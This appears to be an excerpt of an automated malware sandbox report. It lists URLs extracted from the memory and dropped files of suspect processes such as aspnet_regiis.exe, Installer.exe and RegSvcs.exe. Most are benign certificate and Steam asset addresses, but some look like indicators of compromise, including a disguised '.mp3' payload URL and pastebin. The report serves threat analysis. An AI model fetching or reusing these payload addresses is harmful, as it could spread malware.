                Source: aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, MPDIZKEMMIDUY52JFU3.exe.8.dr, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe.7.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                Source: aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, MPDIZKEMMIDUY52JFU3.exe.8.dr, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe.7.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                Source: Installer.exe.29.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA2.crt0#
                Source: Installer.exe, 0000001F.00000002.1912432871.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/
                Source: Installer.exe, 0000001F.00000000.1879185855.0000000000384000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe, 0000001F.00000002.1911878203.0000000000384000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe, 0000001F.00000002.1912432871.000000000155C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000001F.00000002.1912432871.0000000001502000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000001F.00000002.1912432871.0000000001524000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000001F.00000002.1912432871.0000000001547000.00000004.00000020.00020000.00000000.sdmp, Installer.exe.29.drString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3
                Source: Installer.exe, 0000001F.00000002.1912432871.0000000001502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp33
                Source: Installer.exe, 0000001F.00000002.1912432871.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp36
                Source: Installer.exe, 0000001F.00000002.1912432871.0000000001502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp39
                Source: Installer.exe, 0000001F.00000002.1912432871.0000000001502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3lic
                Source: Installer.exe, 0000001F.00000000.1879185855.0000000000384000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe, 0000001F.00000002.1911878203.0000000000384000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe.29.drString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3openSizeofResourcegfDASrtdstyfewrtydwyu3467YdesauydgewyuyVirtualPr
                Source: aspnet_regiis.exe, 00000008.00000003.1652122961.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1648946137.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1646851786.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647706451.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1649257545.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1645741913.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647006571.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1651874968.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1529770557.0000000002948000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1649492847.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1645578502.0000000002935000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1648747393.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1649364315.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1589055516.0000000002934000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647801568.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1645960083.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1650396947.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1650927285.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530908112.0000000002933000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1649640938.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647964141.0000000002936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coX
                Source: powershell.exe, 00000024.00000002.1940781262.00000000062E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: Installer.exe.29.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, MPDIZKEMMIDUY52JFU3.exe.8.dr, Installer.exe.29.dr, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe.7.drString found in binary or memory: http://ocsp.sectigo.com0
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                Source: powershell.exe, 00000024.00000002.1936687043.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000024.00000002.1936687043.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: RegSvcs.exe, 00000021.00000002.1979634479.000000000241E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1936687043.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000024.00000002.1936687043.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000007.00000003.1798740557.0000000005746000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1800576113.0000000004E03000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1774087532.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1773973319.0000000005101000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1800765030.0000000004D79000.00000004.00000800.00020000.00000000.sdmp, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe, 0000000B.00000000.1802966996.0000000000423000.00000002.00000001.01000000.00000005.sdmp, MPDIZKEMMIDUY52JFU3.exe, 0000000C.00000002.1856910943.0000000000423000.00000002.00000001.01000000.00000006.sdmp, MPDIZKEMMIDUY52JFU3.exe.8.dr, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe.7.drString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                Source: powershell.exe, 00000024.00000002.1936687043.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000024.00000002.1936687043.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: aspnet_regiis.exe, 00000007.00000003.1648458748.00000000056A7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: aspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                Source: aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: aspnet_regiis.exe, 0000000A.00000002.1507674483.0000000002903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cl
                Source: aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudfla
                Source: aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.sD
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.sX
                Source: aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.squot;
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                Source: aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507674483.0000000002903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=29ZhU4wRbl
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                Source: aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&l=e
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
                Source: aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
